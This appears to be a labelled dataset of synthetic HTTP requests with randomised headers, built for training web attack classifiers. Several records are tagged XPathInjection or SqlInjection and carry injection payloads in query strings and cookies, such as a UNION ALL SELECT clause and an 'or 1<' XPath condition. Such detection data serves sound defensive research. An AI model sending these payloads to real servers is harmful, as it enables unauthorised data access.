GET /me.bin?pacopgIgft=e1t&onenj=aENm0D5h&xhlrsiw1lc=037443&rppastrS=enn2h6h&t6aok=h8HX1sc HTTP/1.1
Host: 39.61.146.251
Connection: close
Accept: text/xml;q=0.9, image/jpeg;q=0.0, text/plain;q=0.7
Accept-Charset: iso-2022-kr;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 231.214.239.89
Cookie: Co=<;ur48eesRaIi=6990233
Cookie2: $Version="156"
Date: Tue, 28 Jun 05 18:41:54 UTC
ETag: W/"1rGlZI2_N_SUdCE-Yj8"
Expect: msahu7o=dsful7r
From: n9mf@hcs9solg.ch
If-Unmodified-Since: Sun, 05 Aug 07 10:17:42 GMT
If-Match: "7cBmlCEN2Y0gAI2bwU8"
If-None-Match: "ZOzlvLaztZV_h7Pd"
If-Range: *
Max-Forwards: 9
Pragma: ubesbtsn='pdanlfU'
Proxy-Authorization: tyho a4sceAie=eeAlad
Authorization: Digest qop=tttin
Referer: http://atsAe.gov/ntDym5m/utqorw/3dhp/tyhInd.pdf
TE: gzip,chunked
User-Agent: jooBionehcea9LlxrH
UA-CPU: PowerPC
UA-Disp: 749,9643,16
UA-OS: WinNT
UA-Color: color8
Via: 3.3 www.4fmtthod.jpeg:0
Transfer-Encoding: compress
Warning: 139 78.74.97.56:3343 "baAves6intsOfariudt" "Tue, 24 Nov 09 11:16:38 GMT"
----: -----------------------------------------

null

End - Id: 1757
Start - Id: 23400
class: Valid
GET /rE4OQHZ/ake0Itoweir.mdb? HTTP/1.0
Host: www.hbdnE95d.be
Connection: close
Accept: video/quicktime, image/jpeg;q=0.9, image/*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tmd-zLhzhe, lsLIsa-ornte;q=0.4, os-l0hs;q=0.2
Cache-Control: sEhoa5d='uDOuue'
Client-ip: 197.160.242.252
Cookie: thdekhhdeekrt=gg6tnjnlarilro;oO=68700;mvCN8@@=llib
Cookie2: $Version="98"
Date: Mon, 03 Oct 05 16:21:25 UTC
ETag: W/"u0hOJaQV.ZRqffTIUx"
Expect: 100-continue
From: kisol@le4e.uk
If-Modified-Since: Sun, 04 Jan 09 05:22:17 UTC
If-Unmodified-Since: Fri, 27 Jul 07 05:26:59 CET
If-Match: "-ubUxaxUcqPCNgJfK0F"
If-None-Match: "oOJ6SCWWIYWhL2tjHq-"
If-Range: "n9BocchgLwdiUbPwO7.2"
Max-Forwards: 4
MIME-Version: 5.9
Pragma: tarbaliw='VmiRBtsc'
Proxy-Authorization: Digest realm
Authorization: mrpsNk dnd9yiu=rnif
Range: 4420-,4-06,61-
Referer: http://enngt.gov/tetEsi/eiLss/poosta/GirnemT.txt
TE: deflate;q=0.3
Trailer: Connection
User-Agent: gbok (eh@b7z0bGG; o3zyvkmOiC)
UA-CPU: StrongARM
UA-Disp: 9336,5495,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 506x4645
Via: 0.1 www.hpweeiA.js, HTTP/6.5 204.19.137.208:075, 5.6 www.eneo.shtml
Transfer-Encoding: compress
Upgrade: afyagd/6.9, Lcmr8/4.4, yHo8/4.4, oeeIe8/7.6
Warning: 703 www.itpfele.gif "2bdi" "Thu, 20 Oct 05 06:22:20 GMT"
X-Forwarded-For: 95.103.231.158
X-Serial-Number: 329196523
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 23400
Start - Id: 24079
class: Valid
GET /GWXHD/V6ERJSB.-/yg0Hz/nla3/nt9l-Z9N5YPTC.js?.Qiz4updateuVxyB=27125013&sdaLsaehyiseT=87572&dl8daw73eehmfts=Edesa1xt3Dietet2&aucl9t1cmed=8858&geeAeT7d=862&h1e=iBQZ&c5usra5=t.Y9JVdtJhJq&asln=423572&ieaHj3aqm=dfbasabs HTTP/1.0
Host: 44.180.11.201
Connection: close
Accept: text/*;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: fbsIw-T9;q=0.8
Cache-Control: no-store
Client-ip: 246.18.133.160
Cookie: nwlwtivowtrot=9331096932
Cookie2: $Version="56"
Date: Mon, 04 Jul 05 14:56:32 GMT
ETag: W/"3RJM5DCUff-.9YZ2"
Expect: tlafwRq=toesrhEa
From: idehs@lb6ztam.biz
If-Modified-Since: Sat, 15 Nov 08 08:09:34 UTC
If-Unmodified-Since: Mon, 24 Nov 08 05:54:38 GMT
If-Match: "KaW0IWbF805mN8q"
If-None-Match: "KhY.OhiHRkl00dIdC"
If-Range: Wed, 20 Oct 04 01:58:44 UTC
Max-Forwards: 112
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM dWw5ZWJpbTJydHJ0dGZpSm9hdGFzdWtubW5JcU51ZWlidkptVXRkZ3V1Nk9pRQ==
Authorization: Digest response="dd803Ed3ACF4FDFAf84056dac7A41dDC"
Range: 90505-,-578979,95974-3
Referer: /gzsvect/nahai.dll
TE: gzip;q=0.9,deflate,deflate;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/6.9 (Windows; U; Windows NT 4.2; ea-nB; rv:0.0.4) Gecko/85621659
UA-CPU: 68000
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 775x0014
Via: 5.8 www.ttuer4i.tiff
Transfer-Encoding: identity
Upgrade: mexkvt/9.3, jmu/8.9, itee/9.6, hik0q/1.1, fi3/2.5
Warning: 087 64.255.236.21 "s1ahor" 
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 0084225845225079837
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24079
Start - Id: 23987
class: Valid
GET /aWWqOBqdGDD/bolyCaeiohAakofec/2tQALq3/t0dwiz/mnAterbjilcpm/jtgnsjttu/gTMYlYG25YHgAo6MC7X/hedgce/yacdkeecthj6mKle/m5unQHVNrO/sS419Z/ezrQAvMoa._kO2c.asp?r2o9pqssh=s9n5olihuTsolh HTTP/1.1
Host: www.tooIEjsyb.gov
Connection: 7Efsqsdt
Accept: */*;q=0.4
Accept-Charset: iso-8859-6;q=0.2, iso-8859-7, iso-8859-6;q=0.3, gb2312, koi8;q=0.8
Accept-Encoding: *;q=0.7
Accept-Language: nv-eeE, holsru-lnhn, f4-okehtlr, 3u5sg-un, a-hnme
Cache-Control: min-fresh=60
Client-ip: 98.45.103.252
Cookie: trEaDkdrtcTr=flc;ntnmh=h?ol/mmsock_streamiiin1
Cookie2: $Version="6"
Date: Fri, 23 Sep 05 04:35:12 CET
ETag: "-nN7rAfldjaxM.sUD"
Expect: mnzbnee=ldSdec
From: rESt9@oraehs.ch
If-Modified-Since: Thu, 13 Jan 05 07:33:06 UTC
If-Unmodified-Since: Sun, 21 Oct 07 14:20:44 CET
If-Match: *
If-None-Match: "M3_Yo9tBOryfXPR"
If-Range: Tue, 22 Jul 08 07:21:24 GMT
Max-Forwards: 3
MIME-Version: 4.0
Pragma: c=tdmleeO
Proxy-Authorization: NTLM a2dDM2Fvcmllc3Rlc25hdG1tbG1hY3cyYXF5NXQ5ZTJ0Y28wb3RF
Authorization: Digest nonce
Range: 57-083666,74376-4577,088-
Referer: http://www.Xe3rridi.be/meeemsm5/esyiog.js
TE: trailers,deflate,chunked
Trailer: Cache-Control
User-Agent: Mozilla/8.5 (Windows; U; Win 9x 2.0; ib-dt; rv:2.7.9) Gecko/40207230
UA-CPU: StrongARM
UA-Disp: 5815,0896,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 087x1525
Via: 4.3 www.lfO25qni.css, 3.0 www.g7eeCTt.gif:642, 8.3 www.pya0v.htm
Transfer-Encoding: compress
Upgrade: miguh/0.4
Warning: 097 www.wrfc.jpeg "otniol0w" 
X-Forwarded-For: 53.58.146.5
X-Serial-Number: 336999
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 23987
Start - Id: 10204
class: Valid
GET /siZ@2i8_dkPz3/SLuperl4/eietupAr/bi/iF7_u-0CJRKx.gif?hywstMirltsc=lauheat&gtsaxe0lt=ru8&sa=essist1l&oEdt98=hlotbpmhnaHrfhnog2&ekgemthmed=cmExdOpA54&eiooss=2100 HTTP/1.1
Host: 118.104.91.125
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 217.101.27.185
Cookie: suesjEuobt=<tHdu0lAservicesy;ehelhzrictiRd=24
Cookie2: $Version="59"
Date: Tue, 16 Mar 10 17:50:48 CET
ETag: "Div0-MtcnHnCyom9avp@"
Expect: hlcehgHe=cThiawDn
From: Ihr6E@hiaxciCr.gov
If-Modified-Since: Thu, 25 Dec 08 10:35:04 CET
If-Unmodified-Since: Sun, 23 Nov 08 22:16:12 UTC
If-Match: "sg0Ex1fukbqOLY25d"
If-None-Match: *
If-Range: Mon, 15 Feb 10 23:16:57 CET
Max-Forwards: 30
MIME-Version: 9.1
Pragma: peteroe='nmc'
Proxy-Authorization: Digest nonce
Authorization: Digest realm
Range: 740-9444,-64,-396973
Referer: http://www.e3tlLu7p.fr/lonmoep.bin
TE: trailers
Trailer: Pragma
User-Agent: irorrVPesU3t
UA-CPU: MIPS
UA-Disp: 6635,0350,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 099x017
Via: aunft/2.9 36.23.205.140
Transfer-Encoding: identity
Upgrade: ce2fw/5.5
Warning: 637 www.hs6E.png "t1aojshwaSSaeBsobih" "Fri, 24 Jun 05 14:32:42 CET"
X-Forwarded-For: 119.252.21.3
X-Serial-Number: 9799950017867099
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 10204
Start - Id: 48974
class: XPathInjection
GET /S4abeiie5exk/thl/2tse7flirMhan0io8eds/iwCe/processing-instructionKaM3AkIoXbxP/dss/w-fo-ogN-K_n_fA2.exe?ft7slkoreT=63763+++or+++1%3C++dtM%2Famxtlo%2F0ouIa%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D01%5D++or++++67417%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&aoeedowTgre=11677908&neo=379228&olr=coyiXechoaiid4gh&i6o6dteit=02111&traujhs=ti2nd&4i=7981&oeigcl1ds=iwp-iupdate HTTP/1.0
Host: 33.236.80.72
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: PPelxap-Qboeuoi
Cache-Control: no-store
Client-ip: 196.26.247.32
Cookie: hb1odHw=0061587;ereihbnsen=ecypf6BIIN;XD.WTCrW9LL-=alqmkbJ;yoiehuOi=1297;Relogmgiernwz=621230;sxqoeee=2699452691
Cookie2: $Version="23"
Date: Tue, 27 Jun 06 01:38:39 GMT
ETag: W/"49Pljym1-OONdlKqRl"
Expect: 100-continue
From: Sd34@Ehnom.cz
If-Modified-Since: Fri, 22 Dec 06 16:16:38 UTC
If-Unmodified-Since: Tue, 23 Jan 07 15:41:20 CET
If-Match: "JzW6BvOIMdfagAr52dx"
If-None-Match: *
If-Range: "HbC@i-uHkoCB70@3dl7"
Max-Forwards: 2661
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM RmE3Nm9vdGNCZ3BlaXk4ZHJ3aHNiRWVueWRucWVuZ20=
Authorization: ltecs izzi=e1tnnski
Range: 23-,057-,45-
Referer: /6zvrjdCl/Aiert/rrpwtva/raa3en.zip
TE: trailers,deflate,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/2.7 (X11; U; SunOS sun4u 4.7; et-nq; rv:1.4.3) Gecko/47111418
UA-CPU: 68000
UA-Disp: 757,752,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 395x881
Via: FTP/5.0 www.aiao.png, 8.9 14.84.215.100
Transfer-Encoding: compress
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 248 www.elmeri.shtml "SdvreCihiq" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48974
Start - Id: 35772
class: XPathInjection
GET /rtcbos/V7.jpg?at=26953&hn=gfonfon&ielch=bh%27+or+++1%3C++de%2Fn%2Fe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D980%5D+++++or++++%27eY%27++++%3D+%27 HTTP/1.1
Host: 186.95.58.163
Connection: keep-alive
Accept: text/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: iae='iHih'
Client-ip: 92.208.144.125
Cookie: de7s=asot;2oh8txpeotee=5nmsMrqu;nsoidooneic4hh=rheealsaSfnih5e
Cookie2: $Version="11"
Date: Wed, 20 Oct 04 24:02:19 UTC
ETag: W/"sDKuASrOdbuBMPpSmEw"
Expect: ttoH9Am=sbdt;Ilpzdte=rufew
From: Nginnon@eatp.net
If-Modified-Since: Mon, 21 Aug 06 16:47:35 GMT
If-Unmodified-Since: Sun, 14 Mar 04 09:51:00 UTC
If-Match: "n084PCi1_0wB.v-s"
If-None-Match: "e1mIVbAplscG3RX@UO0"
If-Range: Thu, 03 Sep 09 24:55:21 CET
Max-Forwards: 92
MIME-Version: 7.7
Pragma: sne='op3mAeTn'
Proxy-Authorization: Basic cnhhZWk6b29zVlN2
Authorization: NTLM bnNhdHRzZTFjZXhkbmVlbHRlZ2dsaXA4TWQzNmVobWdzYW5pbmFhZWlubmU=
Range: 9042-41
Referer: http://srotnc.ch/fwnrtdr/peciivM/iseae/dacek/8oan6.sh
TE: trailers,gzip
Trailer: If-None-Match
User-Agent: Mozilla/5.8 (Machintosh; U; Mac OS X 2.0; us-3w; rv:3.2.0) Gecko/57342877
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6100x360
Via: tp9Iho/0.7 www.fecej3he.htm, HTTP/9.7 199.187.70.96, 8.0 53.112.8.163:36
Transfer-Encoding: gzip
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 740 216.155.89.107:131 "6yr34ie5" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35772
Start - Id: 33193
class: Valid
PUT /tpzsET6pJZ0_wRqU/ncdaYyel/LY_L/seeinYmsigarlu/tsorsygu9m6o/rfEk1C3T/h_I6W9I-v-.cgi? HTTP/1.0
Content-Length: 321
Content-Language: davecy26
Content-Encoding: identity
Content-Location: /wH5an/nDco/sait/jcwpan/Emdh.mspx
Content-MD5: bG9uZWVUeWhkaEVjZE1lag==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Dec 08 01:09:52 UTC
Last-Modified: Mon, 11 Jun 07 06:02:43 GMT
Host: 241.57.252.84:8336
Connection: close
Accept: audio/*;q=0.9, video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.5, deflate, compress;q=0.2, deflate, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 86.159.104.21
Cookie: rxT.KD=nalone6laard
Cookie2: $Version="05"
Date: Wed, 26 Jan 05 03:12:07 GMT
ETag: "cuNfd9lkCo0c0_RAeqT"
Expect: fttc=bojaii
From: bowRwos@eCtnuhy9r.cz
If-Modified-Since: Tue, 18 May 04 01:34:42 CET
If-Unmodified-Since: Tue, 02 Jan 07 24:25:14 UTC
If-Match: "ff1wYxeBymNNO_ndQ4@"
If-None-Match: *
If-Range: *
Max-Forwards: 31
MIME-Version: 1.6
Pragma: ds6qSe='pl'
Proxy-Authorization: Digest realm
Authorization: Basic ZHRhZzppY2NhaGhlYQ==
Range: 8-21126,9-397638
Referer: http://bdEpemro.biz/tizihNid/6arf/ctO6.tiff
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.2 (compatible; pAhibfh; Win 9x; e6aausfih; vuiaus)
UA-CPU: MIPS
UA-Disp: 3198,1175,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 980x930
Via: 7.0 255.226.40.56, HTTP/5.2 www.eilto.html
Transfer-Encoding: iliC; aefeiif=im7nrabh
Upgrade: blYO/9.0, dN8w/2.7, Ooa0/5.1, NcTat/8.3, alwi/9.7
Warning: 605 165.118.208.207:59007 "stw4t" 
X-Forwarded-For: 184.36.249.222
X-Serial-Number: 0421946796861302632
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

e4=rdf=andoshutdown/[cfoaeo)n&rst=06720&stlowPp=t1dl>oruidlwe cvfromh&BfsytQN2BS0=tooss&iaynnn=t0gimott es<nzvuzbtm&6yatntWii=f2sY9t0mn&s09awr=e4DBz8MW7&3nCIt7srnesibt=16&pcdjwvd9kqhcnej=Egsr4&tngaenkcthktdj=aa5tMat&qerraee2=urunn+E<inrmtinputE&Cedodnl=89674&ozae7nenTso4und=46276&4uhTreetsyj07m=tifQF03UF

End - Id: 33193
Start - Id: 1782
class: Valid
GET /rinnm/UYUXA0aoHrxPyBrZ/57a1dleovter/dQ/poVb.lT0D/SQ6B/2O_sV7rsogwJnOHn/zitnrMir/jz1lbx0gI34I.Yo/ennxtTCmnTo6j/eqCEMyZlQEGxK98C/WVSRl.shtml? HTTP/1.1
Host: 203.134.187.131:80
Connection: egfmdri
Accept: video/*, image/*;q=0.9
Accept-Charset: x-mac-japanese, iso-8859-7
Accept-Encoding: 
Accept-Language: hep-Armaoae;q=0.7, 5-0Ut, iee-l
Cache-Control: no-store
Client-ip: 159.231.87.7
Cookie: ohf5=E7ottyaCs;ZoQ_2_TVh0h=sbh;irn5njiuoz3=sfSCov1
Cookie2: $Version="22"
Date: Sun, 28 Feb 10 24:27:18 GMT
ETag: W/"m4CjLAtP7IC3FCI0_aT"
Expect: 100-continue
From: afReCmmd@ea5oe.uk
If-Modified-Since: Mon, 18 Apr 05 21:18:35 UTC
If-Unmodified-Since: Thu, 22 Jan 04 22:18:47 GMT
If-Match: *
If-None-Match: "rLGmxmGJWEzAa5Kdml"
If-Range: *
Max-Forwards: 25
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Basic cmdjbXF1Omx1bmE=
Authorization: oeje nemip=njnc
Range: 2506-
Referer: http://www.bxhgrbnh.ch/h4eo/cjmdad/tnetfzet.msf
TE: gzip;q=0.8,deflate;q=0.9,trailers
Trailer: Accept
User-Agent: Mozilla/4.9 (Windows; U; WinNT 2.0; yi-nt; rv:3.2.9) Gecko/20822462
UA-CPU: StrongARM
UA-Disp: 0437,4015,8
UA-OS: Linux
UA-Color: color16
Via: 9.0 51.28.53.14
Transfer-Encoding: gzip
Upgrade: hgitd/1.0, qTyqae/6.4, rR3th/0.4
Warning: 693 www.nedn.shtml "onrntmt5TDe1feiCe" 
X-Forwarded-For: 162.29.213.245
X-Serial-Number: 0392549
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1782
Start - Id: 16774
class: Valid
GET /t5yu.jpeg?Mt2R3nteiwsie=55879714&nilS2oAtvremops=ac+I4K4hstoat&ri9ecabwa=lhahyiba8tacn&sSOmtot2ar=6eusu%3E%40rnrtmailuft&kkiatiec0i04=nijc4Tr6ea%26&systemLDrSq=21 HTTP/1.1
Host: 83.231.36.108
Connection: keep-alive
Accept: application/*;q=0.4, image/*;q=0.2
Accept-Charset: x-mac-icelandic;q=0.3, isiri-3342;q=0.8, x-mac-cyrillic;q=0.1, iso-8859-9;q=0.9
Accept-Encoding: gzip;q=0.0, compress, gzip, compress, identity;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 228.43.150.132
Cookie: ny8ntdnljuj=1;sund37BIotodp=2075982267;dopae5=Scr~9;0n83en2h= yid2
Cookie2: $Version="238"
Date: Sat, 09 Jan 10 09:07:18 UTC
ETag: "J-jyQUJFX5X5GVI"
Expect: ae47Res
From: tAgim@uoet.gov
If-Modified-Since: Fri, 26 Mar 10 09:38:43 GMT
If-Unmodified-Since: Tue, 01 Aug 06 09:14:29 UTC
If-Match: *
If-None-Match: "rb7iV.b-yX88PqRkC@EC"
If-Range: "8KyAV6dVGetY8pC7-"
Max-Forwards: 43
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM YWF3ZUVudHVkc0JvaGVodHN5d2V5OHNhcm9iZWVzbGE=
Authorization: hoxO 7t7eeo=uQ0rTcli
Range: 73855-,-7357
Referer: /Tbote/iehnyxy/iobs/mdz3ma/otrseid8.nsf
TE: gzip;q=0.9,trailers,gzip;q=0.1
Trailer: Range
User-Agent: Mozilla/7.4 (X11; U; Linux i586 5.3; Ok-rc; rv:1.9.4) Gecko/61656210
UA-CPU: PowerPC
UA-Disp: 9450,977,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8734x738
Via: 0.2 www.brsi.png, FTP/3.3 150.149.82.74, 8.2 www.nnwz1.js
Transfer-Encoding: compress
Upgrade: ret/6.5, tph/9.9, eiMan/0.4, qEir/6.9, 0be/8.7
Warning: 570 www.aeie.jpeg "o8tLYeamua7c0s" 
X-Forwarded-For: 38.253.106.148
X-Serial-Number: 00770838075
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16774
Start - Id: 42751
class: SqlInjection
PUT /5d94gVYK2rgp/X68Y9w/IK6TmFYQtTp2cMD/8pUfb-AjwGSbgPfGvtd/bOAkBQPBAPsZ.RAnGd/oQoPt.kqZQXmT.d/aRoi7ahwehn.gif? HTTP/1.0
Content-Length: 157
Content-Language: 2
Content-Encoding: identity
Content-Location: http://www.snlpr0.gov/sos7eth/3sofam/6xsei/wtl6i5t.asmx
Content-MD5: MmdvRXpscmRjVHRjZXRsUg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 23 May 05 08:39:50 UTC
Host: 68.2.101.19:80
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 121.170.10.193
Cookie: iclkyT=n;gsuawceeh4uu=jok-9;o4e='    )     UNION    ALL  SELECT   1     FROM     sTt    WHERE ( ''=';epsi2zue4nR4iee=t];eteYoSrhssna=selectldaaoe
Date: Fri, 26 May 06 07:20:19 UTC
ETag: "BF8wKZU95buiZdx3Zfa"
Expect: 100-continue
If-Unmodified-Since: Fri, 14 May 04 14:47:39 GMT
If-Match: "S3_kvo_B_PHuSYGdqS"
If-None-Match: *
If-Range: *
Max-Forwards: 4208
MIME-Version: 0.7
Referer: http://RbtmA.gov/2sennc/teanaj/mi1dagu.pdf
User-Agent: Mozilla/5.6 (X11; U; SunOS sun4u 6.7; et-oh; rv:0.5.2) Gecko/55530439
Via: HTTP/4.1 www.ric3rd5o.shtml
Transfer-Encoding: TiOe; rrf6r=elri
Warning: 782 14.246.109.246 "r0pot" "Sat, 22 Jan 05 18:48:54 UTC"

5kn2=s&vQ0-FwTgNN=55971863&irseniaaliii=1&4taeptdlOaq=Ue&hvwl9e=87&tmuo=0150177&eihar3=9880467&bpe3cei38Gtny=e'access_logrit?0ahq6Ne&ey3ethda7chnt=tLlok5

End - Id: 42751
Start - Id: 21003
class: Valid
GET /7vnyoiGh1Enorofreos/Zi9iframecHvpassthruvJv9/deR5S4ger5lctel5/fLpVw_o0szTM/iBrqK1/yji5BO.q0EQQ.tiff?S5ed3ege=oH25FcLJ&uzhavbeaia=1&eeaagiitegWciri=nsHjtimmbd7fr6e5vm&ye69rlo3plf8=25&it3dpofO=mddlsoosmz2 HTTP/1.0
Host: www.Rt0wLen.com
Connection: rnleshme
Accept: */*
Accept-Charset: iso-8859-4, iso-8859-3
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 241.58.191.36
Cookie: hdoslw5do=|tolst;n0ryGa=ah3a  ibomtsnmKrnEhtpassW
Cookie2: $Version="9"
Date: Thu, 30 Dec 04 14:44:11 GMT
ETag: "3fpwc7WtKU.pmoBi1fR"
Expect: 100-continue
From: ahynt@dfll.st
If-Modified-Since: Mon, 21 Jun 04 22:24:46 GMT
If-Unmodified-Since: Sun, 18 Jul 04 20:34:50 UTC
If-Match: "46KX2u.BNfi0JlsPwkQj"
If-None-Match: "-jVTXlwhUNsDbkJME"
If-Range: *
Max-Forwards: 2711
MIME-Version: 6.4
Pragma: yh1e=nh3ie
Proxy-Authorization: Digest response="a0f19d231EFdE2b1dCCD9A5Daa596122"
Authorization: NTLM TFNzbnJmYWV0dHRsbmRpaW1lc29lOHdibHJhaXR2aW1waGFvYg==
Range: 9864-14,-53
Referer: http://xHefqvE.net/reob/egpI3o2t/osdh4i3i/hewSehxu/zyaS.htm
TE: gzip;q=0.2,deflate,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/6.3 (compatible; MSIE 5.3; SunOS sun4u; qpNrelj)
UA-CPU: 68000
UA-Disp: 665,0570,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 985x390
Via: 1.2 www.tt3h.png, 4.1 www.peemcDni.png, eax/8.4 www.maLesO.html
Transfer-Encoding: gzip
Upgrade: inir/1.9, 5xetc/4.2, 9hdwag/8.3, hph/1.7
Warning: 708 www.ngtwdo8.jpeg "z2owz8ertedtnrau" "Fri, 02 Jan 09 01:16:00 GMT"
X-Forwarded-For: 255.69.11.121
X-Serial-Number: 72612328248662320095
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21003
Start - Id: 2437
class: Valid
GET /tezcFSMm0SbCF_P6e/w_qbXmxovAD_pz/oh.asp?sri=a4hzJ&uo4y=1UD3kdeleterowyeliblnx&hmll=aua&rnyooeerokeuo=dilbIsJcm%7E4rier&5Otnsaq2NSo=6aene&-pHrkEzd=2140919799 HTTP/1.1
Host: 108.247.154.117:80
Connection: Tveeoz
Accept: image/*, text/*;q=0.2, image/gif
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: c0E5Rj-oEs, sulncqfe-ou, iuav3g-lbx;q=0.3, mea-feqmoeX;q=0.5
Cache-Control: only-if-cached
Client-ip: 17.92.203.155
Cookie: 4M-Sv=\nsp<:rbense;jrnnhgbhfrya=9967;masp=w3WjV4TcW7Ak;ekpua2eesws3=2143;ltelnetXTF7pOWEtmpW= qubgsoundw so1tlwSaso;IronHe4n9AqelE=541
Cookie2: $Version="593"
Date: Tue, 05 Sep 06 07:15:15 UTC
ETag: "12Bcc6@sjV9PYr2AM"
Expect: ofld=1vaEplnp;ehzrxmsC=rzsh7r4
From: i6anwg@6eqonb.st
If-Modified-Since: Mon, 09 Nov 09 23:19:15 CET
If-Unmodified-Since: Tue, 20 Sep 05 14:12:45 GMT
If-Match: "j5kt3QMEfQ5hPKF"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZVVuQWl0cmV0MEVnZmhvbHNlYWhpMmVMdG9yejV5ZG9pcmllaTVuT2xld2hsbFJs
Authorization: NTLM c29xc2VtRW83dHRib2FNdGl0YXJoRW5vc2hwcFJpb3NlcnJPd0ll
Range: 489-1,80132-,0066-9
Referer: http://r5jlr.it/7dj6gsc/oits/nndina2/shy6e.jpeg
TE: chunked;q=0.4
Trailer: Accept-Language
User-Agent: Mozilla/8.2 (X11; U; Linux i586 5.5; ca-ua; rv:3.6.4) Gecko/68420426
UA-CPU: x86
UA-Disp: 012,6333,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 750x609
Via: ire/6.8 197.248.101.97
Transfer-Encoding: uiueuo
Upgrade: eentc/2.6, mSansn/5.8, rrshto/6.6, NizNs/4.7
Warning: 700 www.4a6det.shtml:34 "oacNaernE3otntifoh" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 802306505768249437
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2437
Start - Id: 23789
class: Valid
GET /hCRd/Cz.k0nloS/XRaBYncw_evalMKBDCN/ciepiefnhf4a.tiff?kh97h8oetsca6ri=nrY3f9 HTTP/1.1
Host: www.o8tyioe4.fr:60591
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-cyrillic;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 154.88.240.38
Cookie: cd=8uteAef9swit6;9AQkW=85268163;G8lincludeJ=610;w3uct1emnhu4at=skp;eaeY=54340;maz403oi=sopenhos
Cookie2: $Version="616"
Date: Sun, 17 Feb 08 18:48:02 UTC
ETag: W/"XK3x1MeXV6pUd.ROaYk8"
Expect: aUromEo=Alnu7ap7;udnl
From: hotlo9an@ujrsfnuwaa.it
If-Modified-Since: Tue, 08 Aug 06 19:23:17 CET
If-Unmodified-Since: Sat, 19 Apr 08 13:01:24 CET
If-Match: "pGFFdehUqip3rNwJ2"
If-None-Match: "mgQ3U.3n@jWlLfR0x"
If-Range: "39T@t_i-LYff6gaEL"
Max-Forwards: 11
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="teLY"
Authorization: Digest qop=auth-int
Range: 228872-,806438-
Referer: http://7nhe7OAY.st/yeucrhne/eifu.pdf
TE: gzip;q=0.6
Trailer: Accept-Charset
User-Agent: aVNcK7Vr9 http://www.dssl1kxc.ch
UA-CPU: MIPS
UA-Disp: 3668,047,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 884x6494
Via: 2.0 www.lirahf.css, FTP/6.8 www.pevEoo.css:963, 3.6 www.mane4.png
Transfer-Encoding: compress
